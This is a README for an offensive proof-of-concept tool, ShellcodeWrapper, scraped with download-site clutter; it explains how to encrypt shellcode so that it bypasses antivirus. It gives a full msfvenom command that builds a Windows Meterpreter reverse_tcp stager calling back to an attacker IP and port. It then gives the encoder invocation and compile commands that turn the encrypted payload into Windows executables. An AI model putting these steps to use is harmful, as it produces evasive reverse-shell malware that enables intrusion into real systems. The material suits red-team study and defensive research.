Mutlibyte XOR or AES encrypted shellcode
============
Author: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x)
These little proof of concept are inspired by this blogpost: [Bypass antivirus with 10 lines of code](http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html)
The technique uses two kind of code file:
1. The shellcode encoder/encrypter: `shellcode_encoder.py`
2. Various shellcode wrapper, in C++, C# and Python:
- `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption
- `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption
- `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption
Installation
----------------------
Installation is straight forward:
* Git clone this repository: `git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper`
* cd into the ShellcodeWrapper folder: `cd ShellcodeWrapper`
* Install requirements using `pip install -r requirements.txt`
* Give the execution rights to the main script: `chmod +x shellcode_encoder.py`
Usage
----------------------
First, you need to obtain a usable shellcode from metasploit (*run it from a Kali distribution*), for example:
```
root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw
```
In this example, the output is a raw (*unencoded & unencrypted*) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (*payload and parameters*).
Second, run the `shellcode_encoder.py` script along with the desired arguments:
- raw shellcode filename
- encryption key
- encryption type: `xor` or `aes`
- desired output: `base64`, `cpp`, `csharp`, `python`
For instance, to xor encrypt the shellcode with the key '*thisismykey*' and get an output code file in C#, C++ and Python:
```
root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor
```
This will generate C#, C++ and Python code file in the `result` folder. Those files are ready to use/compile.
Eventually:
1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for **Win32 console application** and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
2. For the C# wrapper, compile the C# code file into a Windows executable:
`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs`
3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
具有多种目标语言加密功能的Shellcode包装器.zip (6个子文件)
ShellcodeWrapper-master
shellcode_encoder.py 10KB
readme.md 3KB
templates
encryptedShellcodeWrapper.cs 5KB
encryptedShellcodeWrapper.cpp 984B
encryptedShellcodeWrapper.py 2KB
requirements.txt 17B
共 6 条
- 1
资源评论
快撑死的鱼
- 粉丝: 1w+
- 资源: 9149
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 基于javaweb的网上拍卖系统,采用Spring + SpringMvc+Mysql + Hibernate+ JSP技术
- polygon-mumbai
- Chrome代理 switchyOmega
- GVC-全球价值链参与地位指数,基于ICIO表,(Wang等 2017a)计算方法
- 易语言ADS指纹浏览器管理工具
- 易语言奇易模块5.3.6
- cad定制家具平面图工具-(FG)门板覆盖柜体
- asp.net 原生js代码及HTML实现多文件分片上传功能(自定义上传文件大小、文件上传类型)
- whl@pip install pyaudio ERROR: Failed building wheel for pyaudio
- Constantsfd密钥和权限集合.kt
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功